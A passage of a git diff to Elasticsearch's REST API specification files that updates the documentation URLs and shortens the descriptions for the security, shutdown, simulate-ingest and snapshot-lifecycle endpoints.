b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_privileges.json index 278e8ad2b2e1c..f9d612f557e75 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_privileges.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_privileges.json @@ -1,8 +1,8 @@ { "security.get_privileges":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-get-privileges.html", - "description":"Retrieves application privileges." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-get-privileges", + "description":"Get application privileges" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_role.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_role.json index d5a583f0dda98..7f8fb60e9f396 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_role.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_role.json @@ -1,8 +1,8 @@ { "security.get_role":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-get-role.html", - "description":"Retrieves roles in the native realm." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-get-role", + "description":"Get roles" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_role_mapping.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_role_mapping.json index 88a2f33d22876..6eef7de6a819b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_role_mapping.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_role_mapping.json @@ -1,8 +1,8 @@ { "security.get_role_mapping":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-get-role-mapping.html", - "description":"Retrieves role mappings." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-get-role-mapping", + "description":"Get role mappings" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_service_accounts.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_service_accounts.json index 019fdddd7f17c..38e638a8bcfb4 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_service_accounts.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_service_accounts.json @@ -1,8 +1,8 @@ { "security.get_service_accounts":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-get-service-accounts.html", - "description":"Retrieves information about service accounts." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-get-service-accounts", + "description":"Get service accounts" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_service_credentials.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_service_credentials.json index d3668cbabc8ef..a77225499c03c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_service_credentials.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_service_credentials.json @@ -1,8 +1,8 @@ { "security.get_service_credentials":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-get-service-credentials.html", - "description":"Retrieves information of all service credentials for a service account." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-get-service-credentials", + "description":"Get service account credentials" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_settings.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_settings.json index 6339d8a6dee9c..2bb8b3a595374 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_settings.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_settings.json @@ -1,8 +1,8 @@ { "security.get_settings":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-get-settings.html", - "description":"Retrieve settings for the security system indices" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-get-settings", + "description":"Get security index settings" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_token.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_token.json index 356391a61b5d4..d33eac18b9572 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_token.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_token.json @@ -1,8 +1,8 @@ { "security.get_token":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-get-token.html", - "description":"Creates a bearer token for access without requiring basic authentication." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-get-token", + "description":"Get a token" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_user.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_user.json index 4545d932e6956..6516b70a7e9a5 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_user.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_user.json @@ -1,8 +1,8 @@ { "security.get_user":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-get-user.html", - "description":"Retrieves information about users in the native realm and built-in users." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-get-user", + "description":"Get users" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_user_privileges.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_user_privileges.json index a67a327b71f30..fa746abeb22be 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_user_privileges.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_user_privileges.json @@ -1,8 +1,8 @@ { "security.get_user_privileges":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-get-user-privileges.html", - "description":"Retrieves security privileges for the logged in user." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-get-user-privileges", + "description":"Get user privileges" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_user_profile.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_user_profile.json index 7ba652b9bd74b..f378decda09cb 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_user_profile.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_user_profile.json @@ -1,8 +1,8 @@ { "security.get_user_profile":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-get-user-profile.html", - "description":"Retrieves user profiles for the given unique ID(s)." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-get-user-profile", + "description":"Get a user profile" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.grant_api_key.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.grant_api_key.json index f3cc37bd7450e..e24e3cf357dd1 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.grant_api_key.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.grant_api_key.json @@ -1,8 +1,8 @@ { "security.grant_api_key":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-grant-api-key.html", - "description":"Creates an API key on behalf of another user." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-grant-api-key", + "description":"Grant an API key" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.has_privileges.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.has_privileges.json index 3e6efeb1c2e51..3b66c470846fd 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.has_privileges.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.has_privileges.json @@ -1,8 +1,8 @@ { "security.has_privileges":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-has-privileges.html", - "description":"Determines whether the specified user has a specified list of privileges." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-has-privileges", + "description":"Check user privileges" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.has_privileges_user_profile.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.has_privileges_user_profile.json index 8152170ac939a..66e23de3f56ca 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.has_privileges_user_profile.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.has_privileges_user_profile.json @@ -1,8 +1,8 @@ { "security.has_privileges_user_profile":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-has-privileges-user-profile.html", - "description":"Determines whether the users associated with the specified profile IDs have all the requested privileges." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-has-privileges-user-profile", + "description":"Check user profile privileges" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.invalidate_api_key.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.invalidate_api_key.json index bdf33859d03c0..5618faf0cbf77 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.invalidate_api_key.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.invalidate_api_key.json @@ -1,8 +1,8 @@ { "security.invalidate_api_key":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-invalidate-api-key.html", - "description":"Invalidates one or more API keys." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-invalidate-api-key", + "description":"Invalidate API keys" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.invalidate_token.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.invalidate_token.json index cf4b56a4e2f07..20dc23f1234b2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.invalidate_token.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.invalidate_token.json @@ -1,8 +1,8 @@ { "security.invalidate_token":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-invalidate-token.html", - "description":"Invalidates one or more access tokens or refresh tokens." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-invalidate-token", + "description":"Invalidate a token" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.oidc_authenticate.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.oidc_authenticate.json index 969f5e350705f..5ef393cf64d36 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.oidc_authenticate.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.oidc_authenticate.json @@ -1,8 +1,8 @@ { "security.oidc_authenticate":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-oidc-authenticate.html", - "description":"Exchanges an OpenID Connection authentication response message for an Elasticsearch access token and refresh token pair" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-oidc-authenticate", + "description":"Authenticate OpenID Connect" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.oidc_logout.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.oidc_logout.json index 83f16e5c4de6c..29b07956b62d9 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.oidc_logout.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.oidc_logout.json @@ -1,8 +1,8 @@ { "security.oidc_logout":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-oidc-logout.html", - "description":"Invalidates a refresh token and access token that was generated from the OpenID Connect Authenticate API" + 
"url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-oidc-logout", + "description":"Logout of OpenID Connect" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.oidc_prepare_authentication.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.oidc_prepare_authentication.json index fed4897037435..d1b8727f8caa7 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.oidc_prepare_authentication.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.oidc_prepare_authentication.json @@ -1,8 +1,8 @@ { "security.oidc_prepare_authentication":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-oidc-prepare-authentication.html", - "description":"Creates an OAuth 2.0 authentication request as a URL string" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-oidc-prepare-authentication", + "description":"Prepare OpenID connect authentication" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_privileges.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_privileges.json index 8c920e10f285b..63f235c41c31d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_privileges.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_privileges.json @@ -1,8 +1,8 @@ { "security.put_privileges":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-put-privileges.html", - "description":"Adds or updates application privileges." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-put-privileges", + "description":"Create or update application privileges" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_role.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_role.json index 687bbe561390d..5c09d59be45b1 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_role.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_role.json @@ -1,8 +1,8 @@ { "security.put_role":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-put-role.html", - "description":"Adds and updates roles in the native realm." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-put-role", + "description":"Create or update roles" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_role_mapping.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_role_mapping.json index 12c7e8b1b722c..3d3a8762099ea 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_role_mapping.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_role_mapping.json @@ -1,8 +1,8 @@ { "security.put_role_mapping":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-put-role-mapping.html", - "description":"Creates and updates role mappings." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-put-role-mapping", + "description":"Create or update role mappings" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_user.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_user.json index a3a170b2ecf0b..68b8332f8ecf7 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_user.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_user.json @@ -1,8 +1,8 @@ { "security.put_user":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-put-user.html", - "description":"Adds and updates users in the native realm. These users are commonly referred to as native users." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-put-user", + "description":"Create or update users" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.query_api_keys.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.query_api_keys.json index de95f76ad49db..720ed55ffd252 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.query_api_keys.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.query_api_keys.json @@ -1,8 +1,8 @@ { "security.query_api_keys":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-query-api-key.html", - "description":"Retrieves information for API keys using a subset of query DSL" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-query-api-keys", + "description":"Find API keys with a query" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.query_role.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.query_role.json index d9f9d9f45ff69..4b41fb079ffc6 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.query_role.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.query_role.json @@ -1,8 +1,8 @@ { "security.query_role": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-query-role.html", - "description": "Retrieves information for Roles using a subset of query DSL" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-query-role", + "description": "Find roles with a query" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.query_user.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.query_user.json index 9793e424e6f52..6173ec374c510 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.query_user.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.query_user.json @@ -1,8 +1,8 @@ { "security.query_user": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-query-user.html", - "description": "Retrieves information for Users using a subset of query DSL" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-query-user", + "description": "Find users with a query" }, "stability": "stable", "visibility": "public", diff --git 
a/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_authenticate.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_authenticate.json index e1247d87319ea..67b4de67e2539 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_authenticate.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_authenticate.json @@ -1,8 +1,8 @@ { "security.saml_authenticate":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-saml-authenticate.html", - "description":"Exchanges a SAML Response message for an Elasticsearch access token and refresh token pair" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-saml-authenticate", + "description":"Authenticate SAML" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_complete_logout.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_complete_logout.json index 8a17b7a81c107..106973088c27f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_complete_logout.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_complete_logout.json @@ -1,8 +1,8 @@ { "security.saml_complete_logout":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-saml-complete-logout.html", - "description":"Verifies the logout response sent from the SAML IdP" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-saml-complete-logout", + "description":"Complete a SAML logout" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_invalidate.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_invalidate.json index c18c338817901..2f523f9787157 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_invalidate.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_invalidate.json @@ -1,8 +1,8 @@ { "security.saml_invalidate":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-saml-invalidate.html", - "description":"Consumes a SAML LogoutRequest" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-saml-invalidate", + "description":"Invalidate SAML" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_logout.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_logout.json index 148805b16a853..3415cd92d836e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_logout.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_logout.json @@ -1,8 +1,8 @@ { "security.saml_logout":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-saml-logout.html", - "description":"Invalidates an access token and a refresh token that were generated via the SAML Authenticate API" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-saml-logout", + "description":"Logout of SAML" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_prepare_authentication.json
b/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_prepare_authentication.json index 5691e0d0792ff..a336d45626332 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_prepare_authentication.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_prepare_authentication.json @@ -1,8 +1,8 @@ { "security.saml_prepare_authentication":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-saml-prepare-authentication.html", - "description":"Creates a SAML authentication request" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-saml-prepare-authentication", + "description":"Prepare SAML authentication" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_service_provider_metadata.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_service_provider_metadata.json index 7f7cd557821cc..3d9ffe33f3d74 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_service_provider_metadata.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_service_provider_metadata.json @@ -1,8 +1,8 @@ { "security.saml_service_provider_metadata":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-saml-sp-metadata.html", - "description":"Generates SAML metadata for the Elastic stack SAML 2.0 Service Provider" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-saml-service-provider-metadata", + "description":"Create SAML service provider metadata" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.suggest_user_profiles.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.suggest_user_profiles.json index b52b2b74469e8..1846497e4fa20 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.suggest_user_profiles.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.suggest_user_profiles.json @@ -1,8 +1,8 @@ { "security.suggest_user_profiles":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/security-api-suggest-user-profile.html", - "description":"Get suggestions for user profiles that match specified search criteria." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-suggest-user-profiles", + "description":"Suggest user profiles" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_api_key.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_api_key.json index ff79d3737113f..fce390eadbf13 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_api_key.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_api_key.json @@ -1,8 +1,8 @@ { "security.update_api_key": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-update-api-key.html", - "description": "Updates attributes of an existing API key."
+ "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-update-api-key", + "description": "Update an API key" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_cross_cluster_api_key.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_cross_cluster_api_key.json index e59d6c1efccf8..de518d73732b2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_cross_cluster_api_key.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_cross_cluster_api_key.json @@ -1,8 +1,8 @@ { "security.update_cross_cluster_api_key": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-update-cross-cluster-api-key.html", - "description": "Updates attributes of an existing cross-cluster API key." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-update-cross-cluster-api-key", + "description": "Update a cross-cluster API key" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_settings.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_settings.json index 998548408c5db..bd71a49d99bb0 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_settings.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_settings.json @@ -1,8 +1,8 @@ { "security.update_settings":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-update-settings.html", - "description":"Update settings for the security system index" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-update-settings", + "description":"Update security index settings" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_user_profile_data.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_user_profile_data.json index 8324606a75b44..08089460c1127 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_user_profile_data.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.update_user_profile_data.json @@ -1,8 +1,8 @@ { "security.update_user_profile_data":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-update-user-profile-data.html", - "description":"Update application specific data for the user profile of the given unique ID." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-update-user-profile-data", + "description":"Update user profile data" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/shutdown.delete_node.json b/rest-api-spec/src/main/resources/rest-api-spec/api/shutdown.delete_node.json index 6f1ec484e94d0..cc7144077e4e9 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/shutdown.delete_node.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/shutdown.delete_node.json @@ -1,8 +1,8 @@ { "shutdown.delete_node":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current", - "description":"Removes a node from the shutdown list. Designed for indirect use by ECE/ESS and ECK. Direct use is not supported." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-shutdown-delete-node", + "description":"Cancel node shutdown preparations" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/shutdown.get_node.json b/rest-api-spec/src/main/resources/rest-api-spec/api/shutdown.get_node.json index b29bf5304f782..450f3a5088650 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/shutdown.get_node.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/shutdown.get_node.json @@ -1,8 +1,8 @@ { "shutdown.get_node":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current", - "description":"Retrieve status of a node or nodes that are currently marked as shutting down. Designed for indirect use by ECE/ESS and ECK. Direct use is not supported." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-shutdown-get-node", + "description":"Get the shutdown status" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/shutdown.put_node.json b/rest-api-spec/src/main/resources/rest-api-spec/api/shutdown.put_node.json index 90b19557f5fb2..3df5f36b48119 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/shutdown.put_node.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/shutdown.put_node.json @@ -1,8 +1,8 @@ { "shutdown.put_node":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current", - "description":"Adds a node to be shut down. Designed for indirect use by ECE/ESS and ECK. Direct use is not supported." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-shutdown-put-node", + "description":"Prepare a node to be shut down" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/simulate.ingest.json b/rest-api-spec/src/main/resources/rest-api-spec/api/simulate.ingest.json index 91e7153d466da..401599f5d3344 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/simulate.ingest.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/simulate.ingest.json @@ -1,8 +1,8 @@ { "simulate.ingest":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/simulate-ingest-api.html", - "description":"Simulates running ingest with example documents." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-simulate-ingest", + "description":"Simulate data ingestion" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.delete_lifecycle.json b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.delete_lifecycle.json index 1d66312f053c7..a29caba21a016 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.delete_lifecycle.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.delete_lifecycle.json @@ -1,8 +1,8 @@ { "slm.delete_lifecycle":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/slm-api-delete-policy.html", - "description":"Deletes an existing snapshot lifecycle policy." 
